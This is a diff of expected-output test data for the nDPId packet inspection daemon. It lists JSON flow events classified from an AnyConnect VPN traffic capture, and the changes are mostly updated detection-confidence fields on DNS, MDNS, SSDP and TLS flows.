00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2441,"flow_first_seen":1569687268746,"flow_last_seen":1569687289262,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1469,"flow_tot_l4_payload_len":789975,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1569687241656,"flow_last_seen":1569687287122,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1920,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687286917,"flow_last_seen":1569687286919,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687246981,"flow_last_seen":1569687272376,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2441,"flow_first_seen":1569687268746,"flow_last_seen":1569687289262,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1469,"flow_tot_l4_payload_len":789975,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1569687241656,"flow_last_seen":1569687287122,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1920,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687286917,"flow_last_seen":1569687286919,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1569687246981,"flow_last_seen":1569687272376,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01148{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247596,"flow_last_seen":1569687248620,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +01148{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247596,"flow_last_seen":1569687248620,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
